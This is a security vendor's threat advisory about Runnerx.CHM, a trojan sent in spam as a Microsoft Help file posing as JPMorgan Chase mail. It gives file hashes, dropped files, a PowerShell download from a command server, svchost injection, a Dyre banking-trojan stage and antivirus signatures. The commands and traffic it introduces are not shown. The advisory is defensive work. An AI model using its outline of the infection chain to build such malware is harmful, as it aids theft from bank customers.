Runnerx.CHM , a Microsoft Help file Malware Targets JPMorgan Chase Customers.

May 20, 2015

The Dell Sonicwall Threats Research team observed reports of a Malware family named GAV: Runnerx.CHM (Trojan) Targets global financial services firm specially JPMorgan Chase Customers in the wild. This time attackers used an attached Microsoft Compiled HTML .chm file attached to spam messages. A Microsoft Help file is a binary file, which encompasses a set of HTML files.

The spam arrives via spam email posting as coming from JPMorgan Chase with subject of Chase Bank

Here is an example:

Infection Cycle:

The Malware uses the following icons:

Md5s:

  • 14b166abd7279baa483cfc6e33fc5a3e - Email Attachment (Message.CHM)

  • e821100cd69a0902d6ac5b1e56874692 - Executable Dropper (test.exe)

  • 72841b43391206f983b0fa2ea0be331a - Executable Dropper (p2804us77.exe)

The Malware adds the following files to the system:

  • Message.CHM

    • %TEMP% natmasla2.exe Detected as GAV: Runnerxd1.CHM ( Trojan )

The Malware uses Microsoft Help file scripts to malicious files on the target system such as following:

Once the computer is compromised, the target user sees a fake message from JPMorgan Corporation.

But in the background the Malware runs the following commands on the system:

The file natmasla2.exe is dropped after malware launches on the target system, the malware uses Powershell.exe (Windows PowerShell management framework) for downloading the droppers from C&C server and then starts to inject Svchost.exe to collecting information from target system.

When Powershell.exe was successfully launched on the target system its drops the natmasla2.exe into Temp Folder.

After a while malware tries to generate a dummy URL to download Flash-player from Adobe website.

Then it will download second dropper detected as GAV: Runnerxd2.CHM it is variant of Dyre banking Trojan.

  • 72841b43391206f983b0fa2ea0be331a - Executable Dropper (p2804us77.exe)

Dyre has been designed to target certain banks such as Bank of America and Citi Bank before. Dyre injects malicious code into web browsers, ready to steal information when victims visit their banking site. We recently released observed reports of aDyre.E ,Dyre.F and Dyre.L.

Command and Control (C&C) Traffic

Runnerx.CHM performs C&C communication over HTTP protocol. The malware tries to download droppers from C&C server, here are some examples:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Runnerx.CHM (Trojan)

  • GAV: Runnerxd1.CHM (Trojan)

  • GAV: Runnerxd2.CHM (Trojan)